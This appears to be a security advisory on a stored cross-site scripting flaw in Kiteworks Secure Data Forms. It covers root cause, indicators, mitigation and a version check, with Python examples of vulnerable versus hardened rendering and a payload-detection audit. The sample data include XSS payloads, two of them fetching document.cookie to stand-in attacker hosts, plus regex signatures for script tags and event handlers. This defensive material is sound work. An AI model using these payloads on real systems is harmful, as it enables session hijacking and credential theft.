CVE-2026-24754 Overview
CVE-2026-24754 is a stored cross-site scripting (XSS) vulnerability [CWE-79] affecting Kiteworks, a private data network (PDN) used for secure file sharing and collaboration. The flaw resides in the Secure Data Forms component and impacts all versions prior to 9.3.0. An authenticated attacker can inject persistent JavaScript that executes in the browser sessions of other Kiteworks users. Successful exploitation enables session manipulation, credential theft, and unauthorized actions performed in the victim's context. Kiteworks addressed the issue in version 9.3.0.
Critical Impact
An authenticated attacker can store malicious JavaScript in Secure Data Forms and execute it across other users' sessions, enabling session abuse and data exposure within the Kiteworks PDN.
Affected Products
- Accellion Kiteworks versions prior to 9.3.0
- Kiteworks Secure Data Forms component
- All Kiteworks deployments exposing the vulnerable forms feature to authenticated users
Discovery Timeline
- 2026-06-01 - CVE-2026-24754 published to the National Vulnerability Database (NVD)
- 2026-06-03 - Last updated in NVD database
Technical Details for CVE-2026-24754
Vulnerability Analysis
The vulnerability is a stored XSS flaw in the Kiteworks Secure Data Forms feature. User-supplied input submitted to the forms component is persisted server-side without sufficient output encoding or input sanitization. When other users render views that include the stored data, the browser interprets the attacker-controlled payload as executable JavaScript.
Because the payload is stored and rendered in authenticated user sessions, the attacker does not need to deliver a crafted link. Any user who views the affected form content triggers execution. The Common Weakness Enumeration classification is [CWE-79], Improper Neutralization of Input During Web Page Generation.
Exploitation requires the attacker to hold a valid authenticated account on the Kiteworks instance and the ability to submit data into a Secure Data Form. Victim interaction is required to render the malicious content, but this occurs as part of normal workflow within the application.
Root Cause
The root cause is missing or insufficient sanitization and contextual output encoding of form field content before rendering it back to other users. The application trusts stored form data and emits it into HTML contexts where JavaScript executes.
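An added illustration of the encoding defect described above (example code written for this page, not Kiteworks code: the product's rendering path is not public, and the stored field values below are constructed). It puts a renderer that concatenates stored form values straight into HTML beside one that encodes for the context the value lands in, and shows why a URL attribute needs scheme validation on top of entity encoding.

```python
import html
import re
from urllib.parse import urlparse

# Constructed sample of stored Secure Data Form values (illustrative, not real Kiteworks data).
# The third entry is the kind of payload the advisory describes; whether it runs depends
# entirely on how the renderer writes it back into the page.
STORED_FIELDS = [
    ("Full name", "Alice Example"),
    ("Comment", "Budget is < 5k & due Q3"),
    ("Comment", "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">"),
]


def render_vulnerable(label, value):
    """The CWE-79 pattern: stored text is concatenated straight into HTML."""
    return f"<tr><td>{label}</td><td>{value}</td></tr>"


def render_hardened(label, value):
    """Contextual output encoding for an HTML text node: & < > " ' become entities,
    so the browser shows the payload as literal text instead of parsing a tag."""
    return (
        f"<tr><td>{html.escape(label, quote=True)}</td>"
        f"<td>{html.escape(value, quote=True)}</td></tr>"
    )


def render_link_hardened(url):
    """URL attribute context needs more than entity encoding: 'javascript:alert(1)'
    passes through html.escape unchanged, so the scheme is allow-listed first.
    Parsing fails closed: a malformed scheme yields '' and is rejected."""
    scheme = urlparse(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        return "<span>[link removed]</span>"
    safe = html.escape(url, quote=True)
    return f'<a href="{safe}" rel="noopener noreferrer">{safe}</a>'


# A raw tag opener that is a <script> element or carries an inline event handler.
# Used only to make the difference between the two renderers checkable.
ACTIVE_MARKUP = re.compile(r"<\s*script\b|<\s*[a-z][^>]*\bon[a-z]+\s*=", re.I)


def contains_active_markup(fragment):
    return ACTIVE_MARKUP.search(fragment) is not None


if __name__ == "__main__":
    for label, value in STORED_FIELDS:
        print("vulnerable:", render_vulnerable(label, value))
        print("hardened:  ", render_hardened(label, value))
    print(render_link_hardened("javascript:alert(1)"))
```

The point of the two renderers is that the fix is applied at output time, per context, not by trying to strip "bad" characters on input: the second sample keeps its `<` and `&` intact as text, while the third becomes inert. The link helper exists because `html.escape` alone leaves `javascript:` URIs fully functional inside an `href`.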
Attack Vector
The attack vector is network-based and proceeds through the normal Kiteworks web interface. An authenticated user submits a form containing a JavaScript payload. The payload is stored, then executed in the browsers of subsequent users who load the affected form view, inside the Kiteworks origin and with the victim's session. Any request the script makes to Kiteworks carries the victim's session cookies automatically; if those cookies are marked HttpOnly the script cannot read them directly, but it can still drive the application's API as the victim, which is what makes session abuse possible without ever exfiltrating a token.
The vulnerability manifests in the Secure Data Forms rendering path. No verified public proof-of-concept is available. See the Kiteworks GitHub Security Advisory GHSA-gxvv-hwgc-w7gh for vendor technical details.
Detection Methods for CVE-2026-24754
Indicators of Compromise
- Stored form field values containing HTML or JavaScript constructs such as <script>, onerror=, onload=, or javascript: URIs
- Outbound HTTP requests from user browsers to unexpected external domains immediately after viewing a Secure Data Form
- Unexpected session token usage or API calls originating from authenticated user sessions shortly after form rendering
Detection Strategies
- Inspect Kiteworks application logs for form submissions that include HTML tags or script syntax in user-supplied fields
- Review web proxy and DNS logs for anomalous beaconing from user workstations correlated with Kiteworks form access
- Audit Secure Data Forms data at rest for payloads containing event handlers, encoded scripts, or obfuscated JavaScript
Monitoring Recommendations
- Enable verbose access logging on Kiteworks and forward to a centralized analytics platform for query and retention
- Alert on Kiteworks user accounts that submit form content matching XSS payload signatures
- Monitor for privilege-sensitive actions performed immediately after a user opens a form, which may indicate hijacked session activity
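An added example (not a Kiteworks tool; the submissions are constructed, and the (form_id, submitter, field, value) tuple layout is an assumption about how stored form data or log fields would be exported) implementing the signature audit called for under Indicators of Compromise, Detection Strategies and the alerting item above. It decodes layered URL and HTML-entity encoding before matching, so obfuscated payloads surface, and reports which signature fired for each field.

```python
import html
import re
from urllib.parse import unquote

# Signatures for the constructs listed under Indicators of Compromise, plus common variants.
# They are applied after decoding, so URL- or entity-encoded payloads do not slip past.
XSS_PATTERNS = [
    ("script_tag",     re.compile(r"<\s*script\b", re.I)),
    ("active_element", re.compile(r"<\s*(img|svg|iframe|object|embed|body|video|audio|math)\b", re.I)),
    ("event_handler",  re.compile(r"<[^>]*\bon[a-z]+\s*=", re.I)),          # onerror=, onload=, ... inside a tag
    ("javascript_uri", re.compile(r"(?:^|[=\s'\"])\s*javascript\s*:", re.I)),  # bare or attribute-embedded
    ("data_html_uri",  re.compile(r"data\s*:\s*text/html", re.I)),
]


def normalize(value, rounds=3):
    """Undo layered URL encoding and HTML entities (bounded) so the regexes see the form
    a browser would eventually see. NUL bytes are dropped because some parsers ignore them."""
    current = value
    for _ in range(rounds):
        decoded = html.unescape(unquote(current))
        if decoded == current:
            break
        current = decoded
    return current.replace("\x00", "")


def classify_field(value):
    """Return the names of the signatures that fire on one stored field value."""
    probe = normalize(value)
    return [name for name, pattern in XSS_PATTERNS if pattern.search(probe)]


def audit_submissions(submissions):
    """Run the signatures over (form_id, submitter, field, value) tuples and return
    (form_id, submitter, field, [signature names]) for every value that fires."""
    findings = []
    for form_id, submitter, field, value in submissions:
        hits = classify_field(value)
        if hits:
            findings.append((form_id, submitter, field, hits))
    return findings


# Constructed sample of stored form data (not taken from any real Kiteworks instance).
SAMPLE_SUBMISSIONS = [
    ("form-17", "alice", "comment", "Invoice total is < 5k & approved"),
    ("form-17", "bob",   "comment", "<img src=x onerror=\"fetch('//203.0.113.9/?c='+document.cookie)\">"),
    ("form-22", "carol", "website", "javascript:eval(atob('YWxlcnQoMSk='))"),
    ("form-22", "dave",  "note",    "%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"),
    ("form-31", "erin",  "note",    "&lt;svg onload=alert(1)&gt;"),
    ("form-31", "frank", "note",    "Contact: a@b.example, no markup here"),
]


if __name__ == "__main__":
    for form_id, submitter, field, hits in audit_submissions(SAMPLE_SUBMISSIONS):
        print(f"{form_id} {submitter} {field}: {', '.join(hits)}")
```

Run it over an export of stored Secure Data Forms values or over the form-submission fields in application logs, and key alerts on the submitter. Matching on tag and handler syntax rather than a bare `<` keeps ordinary text such as "a < b" out of the findings; expect to extend the element list for forms that legitimately accept rich text, and treat an entity-encoded hit (the `&lt;svg` case) as something to review rather than proof of exploitation, since it only executes if a later rendering step decodes it.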
How to Mitigate CVE-2026-24754
Immediate Actions Required
- Upgrade all Kiteworks instances to version 9.3.0 or later as the primary remediation
- Inventory existing Secure Data Forms submissions and remove any entries containing script content or HTML event handlers
- Rotate session tokens and force re-authentication for users who may have rendered untrusted form content
Patch Information
Kiteworks released a fix in version 9.3.0. Administrators should apply the upgrade following the vendor's documented procedure. Refer to the Kiteworks Security Advisory GHSA-gxvv-hwgc-w7gh for release notes and upgrade guidance.
Workarounds
- Restrict Secure Data Forms creation and submission to a minimal set of trusted users until the patch is applied
- Apply a strict Content Security Policy (CSP) at the reverse proxy layer to limit inline script execution where feasible. Test the policy against a non-production instance first: a policy that blocks inline scripts also blocks any inline scripts Kiteworks itself depends on, and a CSP only narrows what an injected payload can do; it does not remove the stored payload or the encoding defect
- Increase audit and review cadence for all form submissions during the interim window before upgrade
# Configuration example: verify Kiteworks version is 9.3.0 or later
# The /api/version endpoint and "version" JSON key are as given in this example; confirm them against your deployment's API documentation. Keep TLS verification on (no curl -k) so the check itself cannot be spoofed; sort -V is GNU coreutils.
ver=$(curl -sS "https://<kiteworks-host>/api/version" | grep -oE '"version"[[:space:]]*:[[:space:]]*"[^"]+"' | cut -d'"' -f4)
[ -n "$ver" ] && [ "$(printf '%s\n' 9.3.0 "$ver" | sort -V | head -n1)" = 9.3.0 ] && echo "OK: $ver (>= 9.3.0)" || echo "ACTION: upgrade required (found: ${ver:-unknown})"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


